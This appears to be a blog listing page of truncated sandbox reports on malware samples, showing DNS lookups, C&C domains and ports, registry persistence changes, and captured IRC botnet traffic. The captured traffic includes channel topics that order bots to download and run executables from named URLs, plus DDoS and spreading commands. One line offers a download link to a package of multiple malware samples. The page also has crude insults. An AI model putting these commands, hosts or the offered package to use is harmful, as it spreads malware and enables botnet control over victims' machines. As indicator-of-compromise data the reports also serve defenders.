Author: Pig

DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.7.2 api.albertoshistory.info 73.189.217.224 205.234.144.207 205.234.144.207 astro.ic.ac.uk 155.198.204.78 ale.pakibili.com 208.73.210.29 versatek.com 74.86.204.212 journalofaccountancy.com 64.154.62.195 transnationale.org 85.31.209.210 mas.0730ip.com 69.43.160.174 stayontime.info 42.247.18.99 www.shearman.com 167.68.29.184 insidehighered.com 69.20.66.11 ate.lacoctelera.net 89.17.206.141 websitetrafficspy.com 178.77.123.35 qun.51.com 114.80.89.36 summer-uni-sw.eesp.ch 193.134.218.137 shopstyle.com 74.201.151.180 xxx.stopklatka.pl unclefed.com 209.50.238.18 mcsp.lvengine.com deirdremccloskey.org 173.236.188.113 journals.lww.com 160.109.108.154 middleastpost.org 74.52.145.82 mas.archivum.info scribbidyscrubs.com 199.89.247.25 mas.mtime.com 59.151.32.20Read more...

dc.studyingcenter-org.com 123.183.217.32 dc.tvteam.info dc.babypin.net Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = c:RECYCLERR-1-5-21-1482476501-1644491937-682003330-1013winfixer.exe ReadsRead more...

DNS Lookup Host Name IP Address xeonbox.homeip.net 200.105.228.106 webcache.dyndns.info 127.0.0.1 bnet.doesntexist.org 200.105.228.106 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Outgoing connection to remote server: webcache.dyndns.info TCP port 8888 Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888 Remote Host Port Number 174.132.221.20 80 200.105.228.106 8888 NICK usr331420 USER root 8 * : someRead more...

urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38 72.20.14.38:33333 Nick: {NOVA}[USA][XP-SP3]610119 Username: VirUs VirUs “” “lol” :My_Name_iS_PIG_and_Iam_A_GaY Joined Channel: ##Turb0-XXX## PRIVMSG #d4 :Done.. PRIVMSG #d2 :Done.. Channel Topic for Channel ##Turb0-XXX##: “!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe” Private Message to Channel ##Turb0-XXX##: “Executed process “fsaf24.exe”.” Private Message to Channel ##Turb0-XXX##: “DownloadRead more...

m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199 212.252.34.199:6667 Nick: [AUS|XP|620207] Username: onfkyav Server Pass: m3rc Joined Channel: #m3rc with Password kxfcrt Channel Topic for Channel #m3rc: “.p2p” Private Message to Channel #m3rc: “[p2p]: Spreading to p2p folders.” Set by ccc on Tue Dec 28 08:36:24 Private Message to User [AUS|XP|620207]: “VERSION” Now talking in #2k38 Process Created: Topic isRead more...

Botnet C&C irc pantylost.mooo.com ip: 60.165.98.198 marinehh.twilightparadox.com ip: 60.165.98.198 stockingag.jumpingcrab.com ip: 60.165.98.198 pantylost.crabdance.com ip: 60.165.98.198 addr: onthebreak.UglyAs.com ip: 60.165.98.198 headmefc.AsSexyAs.com ip: 60.165.98.198 computercc.ignorelist.com ip: 60.165.98.198 sandtp.chickenkiller.com ip: 60.165.98.198 greenbarc.IsTheBe.st ip: 60.165.98.198 ringc.strangled.net ip: 60.165.98.198 60.165.98.198:8684 NICK [N00_USA_XP_39922187] USER SP2-917 * 0 :COMPUTERNAME Now talking in #blue3 Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gifRead more...

Here another malware package around 52 mb inside u have multiple malwares Downaload: http://0b975bb5.tinylinks.co

DNS Lookup Host Name IP Address dq.javagames7.com 174.121.62.122 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Outgoing connection to remote server: dq.javagames7.com TCP port 8800 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1413syitm.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunRead more...

Panel:Outgoing connection to remote server: 69.162.99.180 TCP port 8083 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Network” = rundll32.exe “C:Dokumente und EinstellungenAdministratorsys32config.dll”,network HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “DefaultConnectionSettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsConnections “SavedLegacySettings” = [REG_BINARY, size: 91 bytes] HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings “AutoConfigURL” = http://win32.z3nos.com:2011/set.pac Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionFontSubstitutes “MS Shell Dlg 2” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”Read more...

DNS Lookup Host Name IP Address master.easyanticheat.net 80.67.10.234 Outgoing connection to remote server: master.easyanticheat.net TCP port 50301 Outgoing connection to remote server: 82.203.212.9 TCP port 50301 Outgoing connection to remote server: 78.47.251.150 TCP port 50301 Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced “EnableBalloonTips” = [REG_DWORD, value: 00000001] Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggleRead more...